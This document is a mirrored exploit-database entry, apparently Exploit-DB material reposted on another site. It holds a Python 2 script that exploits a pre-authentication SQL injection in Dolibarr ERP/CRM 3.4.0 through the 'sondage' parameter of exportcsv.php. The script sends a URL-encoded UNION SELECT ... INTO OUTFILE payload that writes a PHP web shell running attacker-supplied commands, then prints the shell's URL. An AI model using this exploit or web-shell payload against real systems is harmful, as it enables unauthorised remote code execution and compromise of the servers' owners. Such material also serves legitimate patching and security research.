Dolibarr ERP/CRM 3.4.0 – ‘exportcsv.php?sondage’ SQL Injection - 体验盒子

作者： drone

日期： 2013-10-15

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/28971/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

# Exploit Title: Dolibarr 3.4.0 SQLi

# Date: 10/7/2013

# Exploit author: drone (@dronesec)

# More information: http://forelsec.blogspot.com/2013/10/dolibarr-340-multiple-vulnerabilities.html

# Vendor homepage: http://www.dolibarr.org/

# Software link:

# Version: 3.4.0

# Fixed in: 3.4.1

# Tested on: Ubuntu 12.04 (apparmor disabled)

import urllib2

import string

import random

from argparse import ArgumentParser

""" Preauth web shell via SQL injection

Dolibarr 3.4.0

"""

def run(options):

""" run exploit

"""

print '[!] Dropping web shell on %s...' % options.ip

shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))

sqli = 'http://{0}{1}/htdocs/opensurvey/public/exportcsv.php?sondage='\

.format(options.ip, options.rootp)

# ' UNION SELECT '<?php system($_GET['cmd'])?>,2,3,[..]13 INTO OUTFILE 'yourshell';-- -

exploit = '\'%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\''\

',2,3,4,5,6,7,8,9,10,11,12,13%20INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'\

.format(options.path, shell)

try:

urllib2.urlopen(sqli + exploit)

print '[!] Shell dropped.http://%s%s/documents/%s.php?cmd=ls' % \

(options.ip, options.rootp, shell)

except Exception, e:

print '[-] %s' % e

def parse():

""" Parse cli

"""

parser = ArgumentParser()

parser.add_argument('-i', help='Server address', action='store', dest='ip', required=True)

parser.add_argument('-p', help='Path to Dolibarr install (/dolibarr)', action='store',

default='/dolibarr', dest='rootp')

parser.add_argument('-w', help='Path to drop shell (/var/www/dolibarr/documents)',

action='store', default='/var/www/dolibarr/documents', dest='path')

options = parser.parse_args()

options.path = options.path if options.path[-1] != '/' else options.path[:-1]

options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1]

return options

if __name__ == "__main__":

run(parse())